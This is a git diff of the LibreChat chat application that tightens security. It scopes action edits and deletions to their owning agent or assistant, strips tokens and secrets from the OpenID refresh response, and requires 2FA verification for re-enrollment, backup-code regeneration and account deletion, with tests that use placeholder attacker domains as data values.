diff --git a/api/db/indexSync.js b/api/db/indexSync.js index 8e8e999d92..130cde77b8 100644 --- a/api/db/indexSync.js +++ b/api/db/indexSync.js @@ -236,8 +236,12 @@ async function performSync(flowManager, flowId, flowType) { const messageCount = messageProgress.totalDocuments; const messagesIndexed = messageProgress.totalProcessed; const unindexedMessages = messageCount - messagesIndexed; + const noneIndexed = messagesIndexed === 0 && unindexedMessages > 0; - if (settingsUpdated || unindexedMessages > syncThreshold) { + if (settingsUpdated || noneIndexed || unindexedMessages > syncThreshold) { + if (noneIndexed && !settingsUpdated) { + logger.info('[indexSync] No messages marked as indexed, forcing full sync'); + } logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`); await Message.syncWithMeili(); messagesSync = true; @@ -261,9 +265,13 @@ async function performSync(flowManager, flowId, flowType) { const convoCount = convoProgress.totalDocuments; const convosIndexed = convoProgress.totalProcessed; - const unindexedConvos = convoCount - convosIndexed; - if (settingsUpdated || unindexedConvos > syncThreshold) { + const noneConvosIndexed = convosIndexed === 0 && unindexedConvos > 0; + + if (settingsUpdated || noneConvosIndexed || unindexedConvos > syncThreshold) { + if (noneConvosIndexed && !settingsUpdated) { + logger.info('[indexSync] No conversations marked as indexed, forcing full sync'); + } logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`); await Conversation.syncWithMeili(); convosSync = true; diff --git a/api/db/indexSync.spec.js b/api/db/indexSync.spec.js index c2e5901d6a..dbe07c7595 100644 --- a/api/db/indexSync.spec.js +++ b/api/db/indexSync.spec.js @@ -462,4 +462,69 @@ describe('performSync() - syncThreshold logic', () => { ); expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)'); }); + + test('forces sync when zero documents indexed (reset scenario) even if 
below threshold', async () => { + Message.getSyncProgress.mockResolvedValue({ + totalProcessed: 0, + totalDocuments: 680, + isComplete: false, + }); + + Conversation.getSyncProgress.mockResolvedValue({ + totalProcessed: 0, + totalDocuments: 76, + isComplete: false, + }); + + Message.syncWithMeili.mockResolvedValue(undefined); + Conversation.syncWithMeili.mockResolvedValue(undefined); + + const indexSync = require('./indexSync'); + await indexSync(); + + expect(Message.syncWithMeili).toHaveBeenCalledTimes(1); + expect(Conversation.syncWithMeili).toHaveBeenCalledTimes(1); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] No messages marked as indexed, forcing full sync', + ); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] Starting message sync (680 unindexed)', + ); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] No conversations marked as indexed, forcing full sync', + ); + expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (76 unindexed)'); + }); + + test('does NOT force sync when some documents already indexed and below threshold', async () => { + Message.getSyncProgress.mockResolvedValue({ + totalProcessed: 630, + totalDocuments: 680, + isComplete: false, + }); + + Conversation.getSyncProgress.mockResolvedValue({ + totalProcessed: 70, + totalDocuments: 76, + isComplete: false, + }); + + const indexSync = require('./indexSync'); + await indexSync(); + + expect(Message.syncWithMeili).not.toHaveBeenCalled(); + expect(Conversation.syncWithMeili).not.toHaveBeenCalled(); + expect(mockLogger.info).not.toHaveBeenCalledWith( + '[indexSync] No messages marked as indexed, forcing full sync', + ); + expect(mockLogger.info).not.toHaveBeenCalledWith( + '[indexSync] No conversations marked as indexed, forcing full sync', + ); + expect(mockLogger.info).toHaveBeenCalledWith( + '[indexSync] 50 messages unindexed (below threshold: 1000, skipping)', + ); + expect(mockLogger.info).toHaveBeenCalledWith( + 
'[indexSync] 6 convos unindexed (below threshold: 1000, skipping)', + ); + }); }); diff --git a/api/jest.config.js b/api/jest.config.js index 3b752403c1..47f8b7287b 100644 --- a/api/jest.config.js +++ b/api/jest.config.js @@ -9,7 +9,7 @@ module.exports = { moduleNameMapper: { '~/(.*)': '/$1', '~/data/auth.json': '/__mocks__/auth.mock.json', - '^openid-client/passport$': '/test/__mocks__/openid-client-passport.js', // Mock for the passport strategy part + '^openid-client/passport$': '/test/__mocks__/openid-client-passport.js', '^openid-client$': '/test/__mocks__/openid-client.js', }, transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'], diff --git a/api/models/Action.js b/api/models/Action.js index 20aa20a7e4..f14c415d5b 100644 --- a/api/models/Action.js +++ b/api/models/Action.js @@ -4,9 +4,7 @@ const { Action } = require('~/db/models'); * Update an action with new data without overwriting existing properties, * or create a new action if it doesn't exist. * - * @param {Object} searchParams - The search parameters to find the action to update. - * @param {string} searchParams.action_id - The ID of the action to update. - * @param {string} searchParams.user - The user ID of the action's author. + * @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams * @param {Object} updateData - An object containing the properties to update. * @returns {Promise} The updated or newly created action document as a plain object. */ @@ -47,10 +45,8 @@ const getActions = async (searchParams, includeSensitive = false) => { /** * Deletes an action by params. * - * @param {Object} searchParams - The search parameters to find the action to delete. - * @param {string} searchParams.action_id - The ID of the action to delete. - * @param {string} searchParams.user - The user ID of the action's author. 
- * @returns {Promise} A promise that resolves to the deleted action document as a plain object, or null if no document was found. + * @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams + * @returns {Promise} The deleted action document as a plain object, or null if no match. */ const deleteAction = async (searchParams) => { return await Action.findOneAndDelete(searchParams).lean(); diff --git a/api/models/Action.spec.js b/api/models/Action.spec.js new file mode 100644 index 0000000000..61a3b10f0f --- /dev/null +++ b/api/models/Action.spec.js @@ -0,0 +1,250 @@ +const mongoose = require('mongoose'); +const { MongoMemoryServer } = require('mongodb-memory-server'); +const { actionSchema } = require('@librechat/data-schemas'); +const { updateAction, getActions, deleteAction } = require('./Action'); + +let mongoServer; + +beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + const mongoUri = mongoServer.getUri(); + if (!mongoose.models.Action) { + mongoose.model('Action', actionSchema); + } + await mongoose.connect(mongoUri); +}, 20000); + +afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); +}); + +beforeEach(async () => { + await mongoose.models.Action.deleteMany({}); +}); + +const userId = new mongoose.Types.ObjectId(); + +describe('Action ownership scoping', () => { + describe('updateAction', () => { + it('updates when action_id and agent_id both match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_1', + agent_id: 'agent_A', + metadata: { domain: 'example.com' }, + }); + + const result = await updateAction( + { action_id: 'act_1', agent_id: 'agent_A' }, + { metadata: { domain: 'updated.com' } }, + ); + + expect(result).not.toBeNull(); + expect(result.metadata.domain).toBe('updated.com'); + expect(result.agent_id).toBe('agent_A'); + }); + + it('does not update when agent_id does not match (creates a new doc via upsert)', 
async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_1', + agent_id: 'agent_B', + metadata: { domain: 'victim.com', api_key: 'secret' }, + }); + + const result = await updateAction( + { action_id: 'act_1', agent_id: 'agent_A' }, + { user: userId, metadata: { domain: 'attacker.com' } }, + ); + + expect(result.metadata.domain).toBe('attacker.com'); + + const original = await mongoose.models.Action.findOne({ + action_id: 'act_1', + agent_id: 'agent_B', + }).lean(); + expect(original).not.toBeNull(); + expect(original.metadata.domain).toBe('victim.com'); + expect(original.metadata.api_key).toBe('secret'); + }); + + it('updates when action_id and assistant_id both match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_2', + assistant_id: 'asst_X', + metadata: { domain: 'example.com' }, + }); + + const result = await updateAction( + { action_id: 'act_2', assistant_id: 'asst_X' }, + { metadata: { domain: 'updated.com' } }, + ); + + expect(result).not.toBeNull(); + expect(result.metadata.domain).toBe('updated.com'); + }); + + it('does not overwrite when assistant_id does not match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_2', + assistant_id: 'asst_victim', + metadata: { domain: 'victim.com', api_key: 'secret' }, + }); + + await updateAction( + { action_id: 'act_2', assistant_id: 'asst_attacker' }, + { user: userId, metadata: { domain: 'attacker.com' } }, + ); + + const original = await mongoose.models.Action.findOne({ + action_id: 'act_2', + assistant_id: 'asst_victim', + }).lean(); + expect(original).not.toBeNull(); + expect(original.metadata.domain).toBe('victim.com'); + expect(original.metadata.api_key).toBe('secret'); + }); + }); + + describe('deleteAction', () => { + it('deletes when action_id and agent_id both match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_del', + agent_id: 'agent_A', + metadata: 
{ domain: 'example.com' }, + }); + + const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' }); + expect(result).not.toBeNull(); + expect(result.action_id).toBe('act_del'); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(0); + }); + + it('returns null and preserves the document when agent_id does not match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_del', + agent_id: 'agent_B', + metadata: { domain: 'victim.com' }, + }); + + const result = await deleteAction({ action_id: 'act_del', agent_id: 'agent_A' }); + expect(result).toBeNull(); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(1); + }); + + it('deletes when action_id and assistant_id both match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_del_asst', + assistant_id: 'asst_X', + metadata: { domain: 'example.com' }, + }); + + const result = await deleteAction({ action_id: 'act_del_asst', assistant_id: 'asst_X' }); + expect(result).not.toBeNull(); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(0); + }); + + it('returns null and preserves the document when assistant_id does not match', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_del_asst', + assistant_id: 'asst_victim', + metadata: { domain: 'victim.com' }, + }); + + const result = await deleteAction({ + action_id: 'act_del_asst', + assistant_id: 'asst_attacker', + }); + expect(result).toBeNull(); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(1); + }); + }); + + describe('getActions (unscoped baseline)', () => { + it('returns actions by action_id regardless of agent_id', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_shared', + agent_id: 'agent_B', + metadata: { domain: 'example.com' }, 
+ }); + + const results = await getActions({ action_id: 'act_shared' }, true); + expect(results).toHaveLength(1); + expect(results[0].agent_id).toBe('agent_B'); + }); + + it('returns actions scoped by agent_id when provided', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_scoped', + agent_id: 'agent_A', + metadata: { domain: 'a.com' }, + }); + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_other', + agent_id: 'agent_B', + metadata: { domain: 'b.com' }, + }); + + const results = await getActions({ agent_id: 'agent_A' }); + expect(results).toHaveLength(1); + expect(results[0].action_id).toBe('act_scoped'); + }); + }); + + describe('cross-type protection', () => { + it('updateAction with agent_id filter does not overwrite assistant-owned action', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_cross', + assistant_id: 'asst_victim', + metadata: { domain: 'victim.com', api_key: 'secret' }, + }); + + await updateAction( + { action_id: 'act_cross', agent_id: 'agent_attacker' }, + { user: userId, metadata: { domain: 'evil.com' } }, + ); + + const original = await mongoose.models.Action.findOne({ + action_id: 'act_cross', + assistant_id: 'asst_victim', + }).lean(); + expect(original).not.toBeNull(); + expect(original.metadata.domain).toBe('victim.com'); + expect(original.metadata.api_key).toBe('secret'); + }); + + it('deleteAction with agent_id filter does not delete assistant-owned action', async () => { + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_cross_del', + assistant_id: 'asst_victim', + metadata: { domain: 'victim.com' }, + }); + + const result = await deleteAction({ action_id: 'act_cross_del', agent_id: 'agent_attacker' }); + expect(result).toBeNull(); + + const remaining = await mongoose.models.Action.countDocuments(); + expect(remaining).toBe(1); + }); + }); +}); diff --git a/api/models/Conversation.js b/api/models/Conversation.js 
index 32eac1a764..121eaa9696 100644 --- a/api/models/Conversation.js +++ b/api/models/Conversation.js @@ -228,7 +228,7 @@ module.exports = { }, ], }; - } catch (err) { + } catch (_err) { logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning'); } if (cursorFilter) { @@ -361,6 +361,7 @@ module.exports = { const deleteMessagesResult = await deleteMessages({ conversationId: { $in: conversationIds }, + user, }); return { ...deleteConvoResult, messages: deleteMessagesResult }; diff --git a/api/models/Conversation.spec.js b/api/models/Conversation.spec.js index bd415b4165..e9e4b5762d 100644 --- a/api/models/Conversation.spec.js +++ b/api/models/Conversation.spec.js @@ -549,6 +549,7 @@ describe('Conversation Operations', () => { expect(result.messages.deletedCount).toBe(5); expect(deleteMessages).toHaveBeenCalledWith({ conversationId: { $in: [mockConversationData.conversationId] }, + user: 'user123', }); // Verify conversation was deleted diff --git a/api/models/File.spec.js b/api/models/File.spec.js index 2d4282cff7..ecb2e21b08 100644 --- a/api/models/File.spec.js +++ b/api/models/File.spec.js @@ -152,12 +152,11 @@ describe('File Access Control', () => { expect(accessMap.get(fileIds[3])).toBe(false); }); - it('should grant access to all files when user is the agent author', async () => { + it('should only grant author access to files attached to the agent', async () => { const authorId = new mongoose.Types.ObjectId(); const agentId = uuidv4(); const fileIds = [uuidv4(), uuidv4(), uuidv4()]; - // Create author user await User.create({ _id: authorId, email: 'author@example.com', @@ -165,7 +164,6 @@ describe('File Access Control', () => { provider: 'local', }); - // Create agent await createAgent({ id: agentId, name: 'Test Agent', @@ -174,12 +172,83 @@ describe('File Access Control', () => { provider: 'openai', tool_resources: { file_search: { - file_ids: [fileIds[0]], // Only one file attached + file_ids: [fileIds[0]], + }, + }, + }); + + const { 
hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); + const accessMap = await hasAccessToFilesViaAgent({ + userId: authorId, + role: SystemRoles.USER, + fileIds, + agentId, + }); + + expect(accessMap.get(fileIds[0])).toBe(true); + expect(accessMap.get(fileIds[1])).toBe(false); + expect(accessMap.get(fileIds[2])).toBe(false); + }); + + it('should deny all access when agent has no tool_resources', async () => { + const authorId = new mongoose.Types.ObjectId(); + const agentId = uuidv4(); + const fileId = uuidv4(); + + await User.create({ + _id: authorId, + email: 'author-no-resources@example.com', + emailVerified: true, + provider: 'local', + }); + + await createAgent({ + id: agentId, + name: 'Bare Agent', + author: authorId, + model: 'gpt-4', + provider: 'openai', + }); + + const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); + const accessMap = await hasAccessToFilesViaAgent({ + userId: authorId, + role: SystemRoles.USER, + fileIds: [fileId], + agentId, + }); + + expect(accessMap.get(fileId)).toBe(false); + }); + + it('should grant access to files across multiple resource types', async () => { + const authorId = new mongoose.Types.ObjectId(); + const agentId = uuidv4(); + const fileIds = [uuidv4(), uuidv4(), uuidv4()]; + + await User.create({ + _id: authorId, + email: 'author-multi@example.com', + emailVerified: true, + provider: 'local', + }); + + await createAgent({ + id: agentId, + name: 'Multi Resource Agent', + author: authorId, + model: 'gpt-4', + provider: 'openai', + tool_resources: { + file_search: { + file_ids: [fileIds[0]], + }, + execute_code: { + file_ids: [fileIds[1]], }, }, }); - // Check access as the author const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); const accessMap = await hasAccessToFilesViaAgent({ userId: authorId, @@ -188,10 +257,48 @@ describe('File Access Control', () => { agentId, }); - // Author should have access to all files 
expect(accessMap.get(fileIds[0])).toBe(true); expect(accessMap.get(fileIds[1])).toBe(true); - expect(accessMap.get(fileIds[2])).toBe(true); + expect(accessMap.get(fileIds[2])).toBe(false); + }); + + it('should grant author access to attached files when isDelete is true', async () => { + const authorId = new mongoose.Types.ObjectId(); + const agentId = uuidv4(); + const attachedFileId = uuidv4(); + const unattachedFileId = uuidv4(); + + await User.create({ + _id: authorId, + email: 'author-delete@example.com', + emailVerified: true, + provider: 'local', + }); + + await createAgent({ + id: agentId, + name: 'Delete Test Agent', + author: authorId, + model: 'gpt-4', + provider: 'openai', + tool_resources: { + file_search: { + file_ids: [attachedFileId], + }, + }, + }); + + const { hasAccessToFilesViaAgent } = require('~/server/services/Files/permissions'); + const accessMap = await hasAccessToFilesViaAgent({ + userId: authorId, + role: SystemRoles.USER, + fileIds: [attachedFileId, unattachedFileId], + agentId, + isDelete: true, + }); + + expect(accessMap.get(attachedFileId)).toBe(true); + expect(accessMap.get(unattachedFileId)).toBe(false); }); it('should handle non-existent agent gracefully', async () => { diff --git a/api/models/loadAddedAgent.js b/api/models/loadAddedAgent.js index aa83375eae..101ee96685 100644 --- a/api/models/loadAddedAgent.js +++ b/api/models/loadAddedAgent.js @@ -48,14 +48,14 @@ const loadAddedAgent = async ({ req, conversation, primaryAgent }) => { return null; } - // If there's an agent_id, load the existing agent if (conversation.agent_id && !isEphemeralAgentId(conversation.agent_id)) { - if (!getAgent) { - throw new Error('getAgent not initialized - call setGetAgent first'); + let agent = req.resolvedAddedAgent; + if (!agent) { + if (!getAgent) { + throw new Error('getAgent not initialized - call setGetAgent first'); + } + agent = await getAgent({ id: conversation.agent_id }); } - const agent = await getAgent({ - id: conversation.agent_id, - 
}); if (!agent) { logger.warn(`[loadAddedAgent] Agent ${conversation.agent_id} not found`); diff --git a/api/package.json b/api/package.json index 1618481b58..89a5183ddd 100644 --- a/api/package.json +++ b/api/package.json @@ -44,7 +44,7 @@ "@google/genai": "^1.19.0", "@keyv/redis": "^4.3.3", "@langchain/core": "^0.3.80", - "@librechat/agents": "^3.1.55", + "@librechat/agents": "^3.1.56", "@librechat/api": "*", "@librechat/data-schemas": "*", "@microsoft/microsoft-graph-client": "^3.0.7", @@ -67,7 +67,7 @@ "express-rate-limit": "^8.3.0", "express-session": "^1.18.2", "express-static-gzip": "^2.2.0", - "file-type": "^18.7.0", + "file-type": "^21.3.2", "firebase": "^11.0.2", "form-data": "^4.0.4", "handlebars": "^4.7.7", @@ -109,7 +109,7 @@ "sharp": "^0.33.5", "traverse": "^0.6.7", "ua-parser-js": "^1.0.36", - "undici": "^7.18.2", + "undici": "^7.24.1", "winston": "^3.11.0", "winston-daily-rotate-file": "^5.0.0", "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz", diff --git a/api/server/controllers/AuthController.js b/api/server/controllers/AuthController.js index 13d024cd03..eb44feffa4 100644 --- a/api/server/controllers/AuthController.js +++ b/api/server/controllers/AuthController.js @@ -119,14 +119,8 @@ const refreshController = async (req, res) => { const token = setOpenIDAuthTokens(tokenset, req, res, user._id.toString(), refreshToken); - user.federatedTokens = { - access_token: tokenset.access_token, - id_token: tokenset.id_token, - refresh_token: refreshToken, - expires_at: claims.exp, - }; - - return res.status(200).send({ token, user }); + const { password: _pw, __v: _v, totpSecret: _ts, backupCodes: _bc, ...safeUser } = user; + return res.status(200).send({ token, user: safeUser }); } catch (error) { logger.error('[refreshController] OpenID token refresh error', error); return res.status(403).send('Invalid OpenID refresh token'); diff --git a/api/server/controllers/AuthController.spec.js b/api/server/controllers/AuthController.spec.js index 
fef670baa8..964947def9 100644 --- a/api/server/controllers/AuthController.spec.js +++ b/api/server/controllers/AuthController.spec.js @@ -163,6 +163,16 @@ describe('refreshController – OpenID path', () => { exp: 9999999999, }; + const defaultUser = { + _id: 'user-db-id', + email: baseClaims.email, + openidId: baseClaims.sub, + password: '$2b$10$hashedpassword', + __v: 0, + totpSecret: 'encrypted-totp-secret', + backupCodes: ['hashed-code-1', 'hashed-code-2'], + }; + let req, res; beforeEach(() => { @@ -174,6 +184,7 @@ describe('refreshController – OpenID path', () => { mockTokenset.claims.mockReturnValue(baseClaims); getOpenIdEmail.mockReturnValue(baseClaims.email); setOpenIDAuthTokens.mockReturnValue('new-app-token'); + findOpenIDUser.mockResolvedValue({ user: { ...defaultUser }, error: null, migration: false }); updateUser.mockResolvedValue({}); req = { @@ -189,13 +200,6 @@ describe('refreshController – OpenID path', () => { }); it('should call getOpenIdEmail with token claims and use result for findOpenIDUser', async () => { - const user = { - _id: 'user-db-id', - email: baseClaims.email, - openidId: baseClaims.sub, - }; - findOpenIDUser.mockResolvedValue({ user, error: null, migration: false }); - await refreshController(req, res); expect(getOpenIdEmail).toHaveBeenCalledWith(baseClaims); @@ -229,13 +233,6 @@ describe('refreshController – OpenID path', () => { it('should fall back to claims.email when configured claim is absent from token claims', async () => { getOpenIdEmail.mockReturnValue(baseClaims.email); - const user = { - _id: 'user-db-id', - email: baseClaims.email, - openidId: baseClaims.sub, - }; - findOpenIDUser.mockResolvedValue({ user, error: null, migration: false }); - await refreshController(req, res); expect(findOpenIDUser).toHaveBeenCalledWith( @@ -243,6 +240,25 @@ describe('refreshController – OpenID path', () => { ); }); + it('should not expose sensitive fields or federatedTokens in refresh response', async () => { + await 
refreshController(req, res); + + const sentPayload = res.send.mock.calls[0][0]; + expect(sentPayload).toEqual({ + token: 'new-app-token', + user: expect.objectContaining({ + _id: 'user-db-id', + email: baseClaims.email, + openidId: baseClaims.sub, + }), + }); + expect(sentPayload.user).not.toHaveProperty('federatedTokens'); + expect(sentPayload.user).not.toHaveProperty('password'); + expect(sentPayload.user).not.toHaveProperty('totpSecret'); + expect(sentPayload.user).not.toHaveProperty('backupCodes'); + expect(sentPayload.user).not.toHaveProperty('__v'); + }); + it('should update openidId when migration is triggered on refresh', async () => { const user = { _id: 'user-db-id', email: baseClaims.email, openidId: null }; findOpenIDUser.mockResolvedValue({ user, error: null, migration: true }); diff --git a/api/server/controllers/TwoFactorController.js b/api/server/controllers/TwoFactorController.js index fde5965261..18a0ee3f5a 100644 --- a/api/server/controllers/TwoFactorController.js +++ b/api/server/controllers/TwoFactorController.js @@ -1,5 +1,6 @@ const { encryptV3, logger } = require('@librechat/data-schemas'); const { + verifyOTPOrBackupCode, generateBackupCodes, generateTOTPSecret, verifyBackupCode, @@ -13,24 +14,42 @@ const safeAppTitle = (process.env.APP_TITLE || 'LibreChat').replace(/\s+/g, ''); /** * Enable 2FA for the user by generating a new TOTP secret and backup codes. * The secret is encrypted and stored, and 2FA is marked as disabled until confirmed. + * If 2FA is already enabled, requires OTP or backup code verification to re-enroll. 
*/ const enable2FA = async (req, res) => { try { const userId = req.user.id; + const existingUser = await getUserById( + userId, + '+totpSecret +backupCodes _id twoFactorEnabled email', + ); + + if (existingUser && existingUser.twoFactorEnabled) { + const { token, backupCode } = req.body; + const result = await verifyOTPOrBackupCode({ + user: existingUser, + token, + backupCode, + persistBackupUse: false, + }); + + if (!result.verified) { + const msg = result.message ?? 'TOTP token or backup code is required to re-enroll 2FA'; + return res.status(result.status ?? 400).json({ message: msg }); + } + } + const secret = generateTOTPSecret(); const { plainCodes, codeObjects } = await generateBackupCodes(); - - // Encrypt the secret with v3 encryption before saving. const encryptedSecret = encryptV3(secret); - // Update the user record: store the secret & backup codes and set twoFactorEnabled to false. const user = await updateUser(userId, { - totpSecret: encryptedSecret, - backupCodes: codeObjects, - twoFactorEnabled: false, + pendingTotpSecret: encryptedSecret, + pendingBackupCodes: codeObjects, }); - const otpauthUrl = `otpauth://totp/${safeAppTitle}:${user.email}?secret=${secret}&issuer=${safeAppTitle}`; + const email = user.email || (existingUser && existingUser.email) || ''; + const otpauthUrl = `otpauth://totp/${safeAppTitle}:${email}?secret=${secret}&issuer=${safeAppTitle}`; return res.status(200).json({ otpauthUrl, backupCodes: plainCodes }); } catch (err) { @@ -46,13 +65,14 @@ const verify2FA = async (req, res) => { try { const userId = req.user.id; const { token, backupCode } = req.body; - const user = await getUserById(userId, '_id totpSecret backupCodes'); + const user = await getUserById(userId, '+totpSecret +pendingTotpSecret +backupCodes _id'); + const secretSource = user?.pendingTotpSecret ?? 
user?.totpSecret; - if (!user || !user.totpSecret) { + if (!user || !secretSource) { return res.status(400).json({ message: '2FA not initiated' }); } - const secret = await getTOTPSecret(user.totpSecret); + const secret = await getTOTPSecret(secretSource); let isVerified = false; if (token) { @@ -78,15 +98,28 @@ const confirm2FA = async (req, res) => { try { const userId = req.user.id; const { token } = req.body; - const user = await getUserById(userId, '_id totpSecret'); + const user = await getUserById( + userId, + '+totpSecret +pendingTotpSecret +pendingBackupCodes _id', + ); + const secretSource = user?.pendingTotpSecret ?? user?.totpSecret; - if (!user || !user.totpSecret) { + if (!user || !secretSource) { return res.status(400).json({ message: '2FA not initiated' }); } - const secret = await getTOTPSecret(user.totpSecret); + const secret = await getTOTPSecret(secretSource); if (await verifyTOTP(secret, token)) { - await updateUser(userId, { twoFactorEnabled: true }); + const update = { + totpSecret: user.pendingTotpSecret ?? user.totpSecret, + twoFactorEnabled: true, + pendingTotpSecret: null, + pendingBackupCodes: [], + }; + if (user.pendingBackupCodes?.length) { + update.backupCodes = user.pendingBackupCodes; + } + await updateUser(userId, update); return res.status(200).json(); } return res.status(400).json({ message: 'Invalid token.' 
}); @@ -104,31 +137,27 @@ const disable2FA = async (req, res) => { try { const userId = req.user.id; const { token, backupCode } = req.body; - const user = await getUserById(userId, '_id totpSecret backupCodes'); + const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled'); if (!user || !user.totpSecret) { return res.status(400).json({ message: '2FA is not setup for this user' }); } if (user.twoFactorEnabled) { - const secret = await getTOTPSecret(user.totpSecret); - let isVerified = false; + const result = await verifyOTPOrBackupCode({ user, token, backupCode }); - if (token) { - isVerified = await verifyTOTP(secret, token); - } else if (backupCode) { - isVerified = await verifyBackupCode({ user, backupCode }); - } else { - return res - .status(400) - .json({ message: 'Either token or backup code is required to disable 2FA' }); - } - - if (!isVerified) { - return res.status(401).json({ message: 'Invalid token or backup code' }); + if (!result.verified) { + const msg = result.message ?? 'Either token or backup code is required to disable 2FA'; + return res.status(result.status ?? 400).json({ message: msg }); } } - await updateUser(userId, { totpSecret: null, backupCodes: [], twoFactorEnabled: false }); + await updateUser(userId, { + totpSecret: null, + backupCodes: [], + twoFactorEnabled: false, + pendingTotpSecret: null, + pendingBackupCodes: [], + }); return res.status(200).json(); } catch (err) { logger.error('[disable2FA]', err); @@ -138,10 +167,28 @@ const disable2FA = async (req, res) => { /** * Regenerate backup codes for the user. + * Requires OTP or backup code verification if 2FA is already enabled. 
*/ const regenerateBackupCodes = async (req, res) => { try { const userId = req.user.id; + const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled'); + + if (!user) { + return res.status(404).json({ message: 'User not found' }); + } + + if (user.twoFactorEnabled) { + const { token, backupCode } = req.body; + const result = await verifyOTPOrBackupCode({ user, token, backupCode }); + + if (!result.verified) { + const msg = + result.message ?? 'TOTP token or backup code is required to regenerate backup codes'; + return res.status(result.status ?? 400).json({ message: msg }); + } + } + const { plainCodes, codeObjects } = await generateBackupCodes(); await updateUser(userId, { backupCodes: codeObjects }); return res.status(200).json({ diff --git a/api/server/controllers/UserController.js b/api/server/controllers/UserController.js index 7a9dd8125e..6d5df0ac8d 100644 --- a/api/server/controllers/UserController.js +++ b/api/server/controllers/UserController.js @@ -14,6 +14,7 @@ const { deleteMessages, deletePresets, deleteUserKey, + getUserById, deleteConvos, deleteFiles, updateUser, @@ -34,6 +35,7 @@ const { User, } = require('~/db/models'); const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService'); +const { verifyOTPOrBackupCode } = require('~/server/services/twoFactorService'); const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService'); const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config'); const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools'); @@ -241,6 +243,22 @@ const deleteUserController = async (req, res) => { const { user } = req; try { + const existingUser = await getUserById( + user.id, + '+totpSecret +backupCodes _id twoFactorEnabled', + ); + if (existingUser && existingUser.twoFactorEnabled) { + const { token, backupCode } = req.body; + const result = await verifyOTPOrBackupCode({ user: 
existingUser, token, backupCode }); + + if (!result.verified) { + const msg = + result.message ?? + 'TOTP token or backup code is required to delete account with 2FA enabled'; + return res.status(result.status ?? 400).json({ message: msg }); + } + } + await deleteMessages({ user: user.id }); // delete user messages await deleteAllUserSessions({ userId: user.id }); // delete user sessions await Transaction.deleteMany({ user: user.id }); // delete user transactions @@ -352,6 +370,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => { serverConfig.oauth?.revocation_endpoint_auth_methods_supported ?? clientMetadata.revocation_endpoint_auth_methods_supported; const oauthHeaders = serverConfig.oauth_headers ?? {}; + const allowedDomains = getMCPServersRegistry().getAllowedDomains(); if (tokens?.access_token) { try { @@ -367,6 +386,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => { revocationEndpointAuthMethodsSupported, }, oauthHeaders, + allowedDomains, ); } catch (error) { logger.error(`Error revoking OAuth access token for ${serverName}:`, error); @@ -387,6 +407,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => { revocationEndpointAuthMethodsSupported, }, oauthHeaders, + allowedDomains, ); } catch (error) { logger.error(`Error revoking OAuth refresh token for ${serverName}:`, error); diff --git a/api/server/controllers/__tests__/TwoFactorController.spec.js b/api/server/controllers/__tests__/TwoFactorController.spec.js new file mode 100644 index 0000000000..62531d94a1 --- /dev/null +++ b/api/server/controllers/__tests__/TwoFactorController.spec.js @@ -0,0 +1,264 @@ +const mockGetUserById = jest.fn(); +const mockUpdateUser = jest.fn(); +const mockVerifyOTPOrBackupCode = jest.fn(); +const mockGenerateTOTPSecret = jest.fn(); +const mockGenerateBackupCodes = jest.fn(); +const mockEncryptV3 = jest.fn(); + +jest.mock('@librechat/data-schemas', () => ({ + encryptV3: (...args) => 
